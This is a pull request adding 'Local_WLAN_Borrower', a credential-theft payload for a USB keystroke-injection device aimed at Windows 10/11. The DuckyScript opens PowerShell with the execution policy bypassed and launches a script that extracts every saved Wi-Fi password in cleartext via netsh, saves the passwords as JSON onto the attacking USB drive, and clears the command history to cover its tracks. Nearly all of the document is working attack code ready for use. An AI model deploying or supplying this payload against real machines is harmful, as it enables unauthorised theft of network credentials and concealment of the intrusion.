### PR TITLE
Add Local_WLAN_Borrower payload

### DIFF
--- a/payloads/library/credentials/Local_WLAN_Borrower/1.ps1
+++ b/payloads/library/credentials/Local_WLAN_Borrower/1.ps1
@@ -1,0 +1,49 @@
+# Define the volume label you're looking for
+$targetLabel = "DUCKY"
+
+# Find the drive letter of the USB drive with the specified label
+$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
+
+if ($volume) {
+    $driveLetter = $volume.DriveLetter + ":\"
+    $usbPath = "$driveLetter$env:username.txt"
+    $baseDestinationDir = $driveLetter
+    Write-Output "Drive letter found: $driveLetter"
+} else {
+    Write-Error "Drive with label '$targetLabel' not found."
+    exit
+}
+
+# Initialize an array to store all Wi-Fi profiles and their passwords
+$wifiData = @()
+
+# Get all Wi-Fi profiles
+$profiles = netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+'
+
+foreach ($profile in $profiles) {
+    $wlan = $profile.Matches.Value.Trim()
+
+    # Get the password for the current Wi-Fi profile
+    $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
+    $password = if ($passw) { $passw.Matches.Value.Trim() } else { "No Password Found" }
+
+    # Create a custom object with the profile and password information
+    $wifiData += [PSCustomObject]@{
+        Username = $env:username
+        Profile  = $wlan
+        Password = $password
+    }
+}
+
+# Convert the array of Wi-Fi data to JSON
+$jsonBody = $wifiData | ConvertTo-Json -Depth 3
+
+# Save the JSON data to a file on the USB drive
+$jsonBody | Out-File -FilePath $usbPath -Encoding UTF8
+
+
+
+# Clear the PowerShell command history
+Clear-History
+
+exit

--- a/payloads/library/credentials/Local_WLAN_Borrower/README.md
+++ b/payloads/library/credentials/Local_WLAN_Borrower/README.md
@@ -2,5 +2,6 @@
 This script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.
 
 # Setup
-Make sure the name of your USB is set to "DUCKY". Secondly, put the 1.ps1 file and the inject.bin onto the root of the usb. 
-
+Firstly, download and place the _1.ps1_ script onto the root of your ducky. Then, you will need to edit the inject.txt file accordingly:
+On line 57, change "DUCKY" to the label of your USB. On line 59, change 1.ps1 to the name of the PS1 script on your ducky. 
+Inside of the PS1 script, you will need to replace _DUCKY_ on line 2 with the label of your USB. 

--- a/payloads/library/credentials/Local_WLAN_Borrower/README.md
+++ b/payloads/library/credentials/Local_WLAN_Borrower/README.md
@@ -1,0 +1,6 @@
+### Local_WLAN_Borrower
+This script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.
+
+# Setup
+Make sure the name of your USB is set to "DUCKY". Secondly, put the 1.ps1 file and the inject.bin onto the root of the usb. 
+

--- a/payloads/library/credentials/Local_WLAN_Borrower/payload.txt
+++ b/payloads/library/credentials/Local_WLAN_Borrower/payload.txt
@@ -1,0 +1,29 @@
+REM Title:         Local_WLAN_Borrower
+REM Description:   Borrows wifi passwords and saves them on the DUCKY
+REM Author:        YEETBOY0330
+REM Props:         Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team
+REM Version:       1.0
+REM Category:      Creds
+REM Target:        Windows 10 & 11
+REM Attackmodes:   HID, STORAGE
+
+ATTACKMODE HID STORAGE
+DEFAULTDELAY 20
+
+REM Initial Delay
+DELAY 1000
+
+REM Opens powershell with script execution enabled
+GUI r
+DELAY 700
+STRINGLN powershell -ExecutionPolicy Bypass
+DELAY 4000
+
+REM Gets usb named "DUCKY"
+STRINGLN $targetLabel = "DUCKY"
+STRINGLN $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
+STRINGLN $driveLetter = $volume.DriveLetter + ":"
+STRINGLN cd $driveletter
+
+REM Runs powershell script
+STRINGLN .\1.ps1

--- a/payloads/library/credentials/Local_WLAN_Borrower/payload.txt
+++ b/payloads/library/credentials/Local_WLAN_Borrower/payload.txt
@@ -10,20 +10,70 @@ REM Attackmodes:   HID, STORAGE
 ATTACKMODE HID STORAGE
 DEFAULTDELAY 20
 
-REM Initial Delay
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
 
-REM Opens powershell with script execution enabled
-GUI r
-DELAY 700
-STRINGLN powershell -ExecutionPolicy Bypass
-DELAY 4000
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
 
-REM Gets usb named "DUCKY"
-STRINGLN $targetLabel = "DUCKY"
-STRINGLN $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
-STRINGLN $driveLetter = $volume.DriveLetter + ":"
-STRINGLN cd $driveletter
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
 
-REM Runs powershell script
-STRINGLN .\1.ps1
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM change this to your drive label
+DEFINE #DRIVE_LABEL DUCKY
+REM change this to the name of your PS1 script
+DEFINE #PS1_FILE_NAME 1.ps1
+IF ($_OS == WINDOWS) THEN
+    REM Initial Delay
+    DELAY 1000
+    REM Opens powershell with script execution enabled
+    GUI r
+    DELAY 700
+    STRINGLN powershell -ExecutionPolicy Bypass
+    DELAY 4000
+
+    REM Gets usb drive letter of #DRIVE_LABEL
+    STRINGLN_POWERSHELL
+     $targetLabel = "#DRIVE_LABEL"
+     $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
+     $driveLetter = $volume.DriveLetter + ":"
+     cd $driveletter
+    END_STRINGLN
+    REM Runs powershell script
+    STRINGLN .\#PS1_FILE_NAME
+
+END_IF


### PR DESCRIPTION
My payload intends to get all saved WLAN info stored on a Windows 10/11 machine and put it onto the ducky as a .txt file.
It only requires the USB name to be changed and a .ps1 script added to the root of the duckys' storage.
